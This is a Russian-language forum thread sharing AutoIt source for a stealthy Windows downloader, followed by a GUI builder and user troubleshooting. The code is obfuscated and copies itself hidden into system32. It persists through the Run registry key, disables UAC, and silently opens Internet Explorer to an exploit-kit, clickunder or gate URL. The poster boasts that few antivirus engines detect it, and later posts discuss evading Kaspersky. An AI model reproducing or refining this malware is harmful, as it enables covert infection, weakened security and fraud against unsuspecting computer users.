Предлагаю как вариант даунлоадера: (AutoIt) PHP: #AutoIt3Wrapper_Run_Obfuscator=y;криптуем #Obfuscator_Parameters=/SF /SV /CV /CF /CS /CN;криптуем #RequireAdmin ; с правами админа #NoTrayIcon ; скрываем иконку в трее #include <IE.au3> #include <File.au3> #include <WindowsConstants.au3> $wind = @SystemDir ; переменная системной директории FileCopy(@ScriptName , $wind, 1);копируем в system32 FileSetAttrib($wind & "\" & @ScriptName, "+SH");атрибуты файла скрытые RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run", @ScriptName, "REG_SZ", $wind & "\" & @ScriptName) ; добавляем в автозапуск RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0") ; отключаем UAC $ping = Ping("www.google.com") ; проверяем подключение интернета If Not @error Then ; если инет есть продолжаем $oIE = _IECreate("http://site.com/index.php", 0, 0) ; ссылка на связку,даунлоадер, clickunder и т.д Sleep(15000) ; ждем 15 сек _IEQuit($oIE) ; закрываем IE Else ;иначе пингуем Do $ping = Ping("www.google.com") Until Not @error EndIf Exit скрыто запускает IE с ссылкой на указанный сайт,(запускаеться в фоне) там может быть связка, clickunder (сам поинты зарабатываю),гейты и т.д Запускается с правами админа отключает UAC добов. в автозагрузку ждет подкл. к инету После компиляции пока вроде 2 из 47 палят Ссылка для скачивания AutoIt: ТУТ Ссылка форума AutoIt: ТУТ
Сделал гуи.(функции те же что и постом выше) все просто, вставляем адрес ссылки,жмем готово и в папке new получаем скомпиленный Ie.exe. В архиве сорец, сама прога (Hide_Ie.exe) и софт для компиляции. Ссылка
valyka80, Все сделал как ты написал и после запуска готового файла вылазит: Для загрузки использовал ссылку с файлообменника rghost. Что я делаю неправильно?
Вот мой запуск Ie.exe с сылкой на связку,работает :dontknow: какая винда у тебя (XP,7 32 или 64) поясни буду исправлять,на всякий случай перезалью полный софт для компиляции и кое что подправлю. Перезалил
У меня Win 7 x64. Запускал у себя и на виртуалке(там та же винда) Теперь каспер сразу сожрал) Когда выключал антивир, результаты те же что я и выше кидал скрин Кстати пробовал просто с изображением сделать а не с .exe и результаты на старой и перезалитой такие же(запрашивается разрешение у пользователя): и при нажатии "Закрыть" вылетает: Надеюсь разберешься) если что пиши что еще потестить, помогу чем смогу